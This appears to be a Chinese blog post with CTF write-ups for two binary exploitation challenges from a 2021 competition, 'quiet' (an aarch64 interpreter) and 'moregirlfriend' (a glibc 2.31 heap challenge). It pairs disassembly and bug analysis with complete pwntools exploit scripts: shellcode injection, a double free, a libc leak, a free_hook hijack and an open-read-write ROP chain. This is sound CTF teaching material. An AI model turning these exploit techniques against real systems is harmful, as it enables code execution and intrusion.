.text:00000000000010CC 0C0                 LDP             X21, X22, [SP,#0xC0+var_A0]	
.text:00000000000010D0 0C0                 LDR             X2, [X20]	//x20=0x100000000000
.text:00000000000010D4 0C0                 LDR             X27, [X29,#0xC0+var_70]
.text:00000000000010D8 0C0                 LDP             X19, X20, [SP,#0xC0+var_B0]
.text:00000000000010DC 0C0                 LDP             X29, X30, [SP+0xC0+var_C0],#0xC0
.text:00000000000010E0 000                 BR              X2	//跳转执行

然后就是输入，有一个 getchar()功能，能够向 0x100000000000输入一个字符。x22为写指针，初始为 0x100000000000

.text:0000000000001154 -C0                 LDR             X0, [X25]
.text:0000000000001158 -C0                 ADD             X21, X21, #1
.text:000000000000115C -C0                 BL              ._IO_getc	
.text:0000000000001160 -C0                 STRB            W0, [X22]		//x22为写指针
.text:0000000000001164 -C0                 LDURB           W0, [X21,#-1]
.text:0000000000001168 -C0                 LDR             X0, [X26,X0,LSL#3]
.text:000000000000116C -C0                 BR              X0

然后就是找能够使 x22加1的功能，找到如下

.text:00000000000011C4     loc_11C4                                ; DATA XREF: .data:off_12018↓o
.text:00000000000011C4 -C0                 LDRB            W0, [X21]
.text:00000000000011C8 -C0                 ADD             X22, X22, #1	//写指针加1
.text:00000000000011CC -C0                 ADD             X21, X21, #1
.text:00000000000011D0 -C0                 LDR             X0, [X26,X0,LSL#3]
.text:00000000000011D4 -C0                 BR              X0

利用分析

那么就很简单，利用 getchar()和写指针加1，向堆块写入shllcode。

最后跳转执行shellcode即可。

EXP

from pwn import *
context.update(arch='aarch64',os='linux',log_level='debug')
context.terminal(['tmux','split', '-h'])

filename = './quiet'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 0
if debug == 1:
    p = process(['qemu-aarch64-static','-L', "./", filename])
    libc = ELF(libcname)
else:
    p = remote('8.140.179.11', 51322)
    libc = ELF(libcname)
    elf = ELF(filename)

getc = 0x29
add = 0x23
jmpexec = 0x47

def Pwn():
    shellcode = asm(shellcraft.sh())
    lens = len(shellcode)
    shell_code = ""
    for i in range(lens):
        shell_code += p8(getc)+p8(add)
    shell_code += p8(jmpexec)

    p.sendlineafter('cmd> ',shell_code)

    for i in range(lens):
        p.send(shellcode[i:i+1])

    p.interactive()

Pwn()

moregirlfriend

程序分析

__int64 dele()
{
  int i; // [rsp+8h] [rbp-8h]
  int j; // [rsp+8h] [rbp-8h]

  if ( !dword_4010 )
    exit(0);
  for ( i = 0; i <= del_num && free_list[i]; ++i )
  {
    printf("%s has left you.\n", (const char *)free_list[i]);
    free((void *)free_list[i]);
  }
  for ( j = 0; j <= 7; ++j )
    free_list[j] = 0LL;
  --dword_4010;
  del_num = 0;
  return 0LL;
}

在 delete时，判断了 i<=del_num，这里存在越界。当 del_num=8可以多释放一个堆块，也即9个堆块。而 free_list只能装8个堆块，紧邻的是 chunk_list。也就是这里可以多释放一次堆块。

.bss:0000000000004060     free_list       dq 8 dup(?)             ; DATA XREF: leave+E1↑o
.bss:0000000000004060                                             ; dele+44↑o ...
.bss:00000000000040A0     ; _QWORD chunk_list[16]
.bss:00000000000040A0     chunk_list      dq 10h dup(?)           ; DATA XREF: ADD+F8↑o
.bss:00000000000040A0                                             ; ADD+148↑o ...
.bss:0000000000004120     ; _QWORD size_list[16]
.bss:0000000000004120     size_list       dq 10h dup(?)           ; DATA XREF: ADD+D0↑o
.bss:00000000000041A0     ; _QWORD used_list[16]
.bss:00000000000041A0     used_list       dq 10h dup(?)           ; DATA XREF: ADD+58↑o
.bss:00000000000041A0                                             ; ADD+110↑o ...
.bss:0000000000004220     del_num         dd ?                    ; DATA XREF: leave+30↑w

利用分析

我们可以先把 chunk_list[0]放入 free_list中释放，然后释放8个堆块时，会将紧邻的 chunk_list[0]再次释放。也就是存在一个 double free。

2.31的 double free在不能修改 key时，可以考虑将 double free放入 fastbin中。通过 fastbin的 double free来实现分配任意堆块。

泄露地址

这里泄露地址比较麻烦，主要是我们不能通过释放到 unsortedbin在申请回来输出，因为输出会在后面添上 \x00。我这里采用了堆合并，将 3个大堆块按照 1，3，2的顺序释放到 unsortdebin中，然后在第一个和第三个留下了 libc地址。然后通过申请一个占位，再申请一个大堆块，使得其末尾刚好位于第三个堆块的 libc地址。例如申请一个大堆块 0x400,使其 0x408处刚好为 libc地址。然后再释放该堆块，即可泄露libc地址。

double free

按照上述的方法，在 fastbin中构造 double free。而且这样还可以泄漏堆地址。我们构造如下：

1	chunk[0]->chunk[7]->chunk[0]

当我们将 tcache清空，再申请一个 fastbin chunk0 时，整个 fastbin链会被移入 tcache中，我们将 chunk[0]的 next指针指向一个 0x400 大堆块的上方，构造堆重叠。最后通过堆重叠，实现劫持0x400指向 free_hook。最后 orw。

EXP

#encoding=utf-8
from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux','split','-h'])
filename = './moregirlfriend'
libcname = '/lib/x86_64-linux-gnu/libc.so.6'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF(libcname)
else:
    p = remote('8.140.179.11', 13452)
    libc = ELF(libcname)
    elf = ELF(filename)

def Add(num, size, payload):
    p.sendlineafter('wow:', str(1))
    p.sendlineafter('more one?\n', str(num))
    p.sendlineafter('Height?\n', str(size))
    p.sendlineafter('girlfriend?\n', payload)

def Leave(num, del_num):
    p.sendlineafter('wow:', str(2))
    p.sendlineafter('leave you?\n', str(num))
    p.sendlineafter('girlfriend?\n', str(del_num))

def Delete():
    p.sendlineafter('wow:', str(3))

def magic_frame(magic_addr, free_hook, setcontext, ret,orw):
    frame_addr = free_hook
    orw_addr = free_hook+0xb0
    payload = p64(magic_addr) + p64(frame_addr)
    payload += p64(0) * 2 + p64(setcontext+61) + b"./flag\x00".ljust(8, b"\x00")
    payload += b"\x00" * 0x70 + p64(orw_addr) + p64(ret)
    payload += orw
    return payload

def Pwn():
    payload = (p64(0x0)+p64(0x81))*7
    Add(1, 0x70, payload)
    payload = (p64(0x20)+p64(0x21))*7
    Add(0, 0x70, payload)
    for i in range(7+7):
        Add((i+2), 0x70, payload)

    Leave(7, 1)
    for i in range(6):
        p.sendlineafter('girlfriend?\n', str(i+2))
    Delete()

    Add(1, 0x440, 'a'*0x440)
    Add(2, 0x430, 'a'*0x430)
    Add(3, 0x420, 'a'*0x10)
    Add(4, 0x400, 'a'*0xf0)

    #gdb.attach(p, 'bp $rebase(0x1924)')
    Leave(3, 1)
    p.sendlineafter('girlfriend?\n', str(3))
    p.sendlineafter('girlfriend?\n', str(2))
    Delete()
    print("chunk consolidate")
    Add(1, 0x480, 'a'*0x480)
    Add(2, 0x400, 'a'*0x400)
    Leave(2, 2)
    p.sendlineafter('girlfriend?\n', str(4))
    Delete()
    p.recvuntil('a'*0x400)
    libc_addr = u64(p.recv(6).ljust(8, b'\x00'))
    libc_addr = libc_addr-0x10-96-libc.sym['__malloc_hook']
    print('libc_addr:',hex(libc_addr))
    free_hook = libc_addr+libc.sym['__free_hook']
    setcontext = libc_addr+libc.sym['setcontext']

    #gdb.attach(p, 'bp $rebase(0x1924)')
    #double free fastbin
    Leave(8, 8)
    p.sendlineafter('girlfriend?\n', str(9))
    for i in range(4):
        p.sendlineafter('girlfriend?\n', str(i+10))
    p.sendlineafter('girlfriend?\n', str(0))
    p.sendlineafter('girlfriend?\n', str(15))
    print("double free")
    Delete()
    heap_addr = u64(p.recvuntil('\x55')[-3:].ljust(8, b'\x00'))-0x630+0x555555000000+0xc50+0x8c0-0x90
    print('heap_addr:',hex(heap_addr))

    for i in range(7):
        Add(i+5, 0x70, 'a'*0x10)
    print("chunk extend")
    payload = p64(heap_addr)
    Add(12, 0x70, payload)  #chunk0
    Add(13, 0x70, payload)
    Add(0, 0x70, payload)  #chunk0
    payload = p64(free_hook)
    Add(2, 0x70, payload)  #chunk extend

    open_addr = libc_addr + libc.sym['open']
    read_addr = libc_addr + libc.sym['read']
    write_addr = libc_addr + libc.sym['write']
    flag_str_addr = free_hook + 0x28
    flag_addr = free_hook + 0x220
    syscall = 0x66229 + libc_addr
    pop_rax = 0x4a550 + libc_addr
    pop_rdi = 0x26b72+ libc_addr
    pop_rsi = 0x27529 + libc_addr
    pop_rdx_r12 = 0x11c371+libc_addr
    ret = 0x25679 + libc_addr

    orw = flat([
        pop_rdi, flag_str_addr,
        pop_rsi, 0,
        # pop_rdx_r12, 2,
        open_addr,
        # pop_rax, 2,
        # syscall,
        pop_rdi, 3,
        pop_rsi, flag_addr,
        pop_rdx_r12, 0x50, 0,
        read_addr,
        pop_rdi, 1,
        pop_rsi, flag_addr,
        pop_rdx_r12, 0x30, 0,
        write_addr
    ])


    frame_address = free_hook
    orw_address = free_hook + 0xb0
    magic_addr = 0x0000000000154930 + libc_addr
    print("hajack free_hook")
    payload = p64(magic_addr) + p64(frame_address)
    payload += p64(0) * 2 + p64(setcontext+61) + b"./flag\x00".ljust(8, b"\x00")
    payload += b"\x00" * 0x70 + p64(orw_address) + p64(ret)
    payload += orw
    #gdb.attach(p, 'bp $rebase(0x1924)')
    Add(3, 0x400, 'a'*0x10)
    Add(4, 0x400, payload)

    Leave(1, 4)
    Delete()

    p.interactive()

Pwn()

1	79 6f 75 20 73 75 63 63 65 73 73 66 75 6c 79 20 72 6f 62 62 65 64 20 79 6f 75 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 72 6f 62 62 65 64 20

本文作者： A1ex
本文链接： http://yoursite.com/2021/04/05/2021红明谷and虎符题解/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！